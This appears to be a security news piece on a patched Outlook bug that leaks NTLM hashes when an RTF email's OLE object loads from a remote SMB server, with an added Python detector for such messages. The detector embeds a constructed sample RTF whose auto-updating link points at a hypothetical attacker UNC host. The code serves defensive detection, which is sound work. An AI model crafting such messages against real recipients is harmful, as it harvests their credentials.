Microsoft has fixed an important Outlook bug it's known about for over a year, capable of leaking password hashes when users preview a Rich Text Format (RTF) email with remotely hosted OLE objects.
The bug, reported by CERT/CC vulnerability analyst Will Dormann in November 2016, was finally fixed in yesterday's Patch Tuesday release.
The risk to passwords stems from how Outlook handles RTF email with Object Linking and Embedding (OLE) objects that are hosted on a remote SMB server.
SMB (Server Message Block) is Windows' network file-sharing protocol. When a Windows client connects to an SMB server, it typically authenticates with Microsoft's NT LAN Manager (NTLM) challenge-response protocol, sending its user name along with a response computed from the user's password hash, which is what makes a connection to an attacker-controlled server dangerous.
In 2016, Dormann discovered that Microsoft didn't apply the same restrictions on content loaded from a remote SMB server as it did for web-hosted content.
Outlook won't, for example, automatically load web-hosted images in email because it may leak a client's IP address and metadata details such as the time the email is viewed.
However, this precaution isn't present in Outlook when recipients preview an RTF email message with an OLE object loaded from a remote SMB server.
Dormann found that the OLE-over-SMB scenario leaks much more than the user's IP address. As soon as the email is previewed, the PC automatically negotiates an SMB session with the remote, potentially malicious server, handing it the client's IP address, domain name, user name and host name, together with the NTLM authentication response (commonly called a Net-NTLM hash) for the logged-on user. That response is not the password itself, but it can be cracked offline to recover a weak password, or, in some configurations, relayed to authenticate to other services as that user.
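To make the mechanism concrete, here is an added Python example (not code from the article, Microsoft or CERT/CC) that scans an RTF body for OLE objects whose embedded data references a UNC path, the indicator that previewing the message would trigger an outbound SMB connection and NTLM authentication. The sample message, the TEST-NET address and the layout of the hex-encoded object data are constructed for illustration and only mimic the part of a real OLE stream that matters here, the link target.

```python
import re

# Constructed sample (not from the article): an RTF message carrying an OLE linked
# object whose link target is a UNC path on a hypothetical attacker-controlled host.
UNC_TARGET = "\\\\203.0.113.10\\share\\logo.bmp"   # TEST-NET address, hypothetical

_OBJ_BLOB = (
    b"\x01\x05\x00\x00\x02\x00\x00\x00"            # made-up header bytes, not real OLE layout
    + UNC_TARGET.encode("utf-16-le")               # Windows stores such paths as UTF-16LE
    + b"\x00\x00"
)

SAMPLE_RTF = (
    "{\\rtf1\\ansi\\deff0 Quarterly figures are in the embedded sheet.\\par "
    "{\\object\\objautlink\\objw3000\\objh1500"    # \objautlink: link is refreshed automatically
    "{\\*\\objclass Package}"
    "{\\*\\objdata " + _OBJ_BLOB.hex() + "}}"      # \objdata carries the object as hex text
    "\\par}"
).encode("ascii")

# UNC paths inside the decoded object stream, either as ASCII or as UTF-16LE.
_UNC_ASCII = re.compile(rb"\\\\[A-Za-z0-9.\-_]+\\[\x21-\x7e]+")
_UNC_UTF16 = re.compile(rb"(?:\\\x00){2}(?:[A-Za-z0-9.\-_]\x00)+\\\x00(?:[\x21-\x7e]\x00)+")

_OBJDATA = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def _decode_objdata(hex_blob: bytes) -> bytes:
    """Turn the whitespace-tolerant hex text of an \\objdata group back into bytes."""
    hexstr = re.sub(rb"\s+", b"", hex_blob)
    if len(hexstr) % 2:
        hexstr = hexstr[:-1]  # tolerate a truncated trailing nibble instead of raising
    return bytes.fromhex(hexstr.decode("ascii"))


def find_unc_targets(blob: bytes) -> list:
    """Return every UNC path (\\\\server\\share\\...) found in a binary blob."""
    found = [m.group(0).decode("ascii") for m in _UNC_ASCII.finditer(blob)]
    found += [m.group(0).decode("utf-16-le") for m in _UNC_UTF16.finditer(blob)]
    return sorted(set(found))


def scan_rtf(rtf: bytes) -> list:
    """One dict per \\object group: whether it is an auto-updating link and which
    UNC (SMB) targets its OLE data references."""
    results = []
    starts = [m.start() for m in re.finditer(rb"\\object\b", rtf)]
    for i, start in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(rtf)
        chunk = rtf[start:end]
        targets = []
        for m in _OBJDATA.finditer(chunk):
            targets += find_unc_targets(_decode_objdata(m.group(1)))
        results.append({
            "autolink": b"\\objautlink" in chunk,
            "unc_targets": sorted(set(targets)),
        })
    return results


def is_suspicious(rtf: bytes) -> bool:
    """True when any OLE object points at a UNC path: previewing such a message can
    make Outlook open an SMB session and authenticate with NTLM to that host."""
    return any(r["unc_targets"] for r in scan_rtf(rtf))


if __name__ == "__main__":
    for r in scan_rtf(SAMPLE_RTF):
        print(r)
    print("suspicious:", is_suspicious(SAMPLE_RTF))
```

A check like this belongs at the mail gateway, where the RTF body can be inspected before it reaches a preview pane; it flags the link target rather than the object class, because the leak is caused by where the object is fetched from, not by what it claims to be. Egress filtering of SMB (TCP 445) to untrusted networks remains the standard compensating control for this whole class of NTLM-leak bugs, independent of which client application triggers the connection.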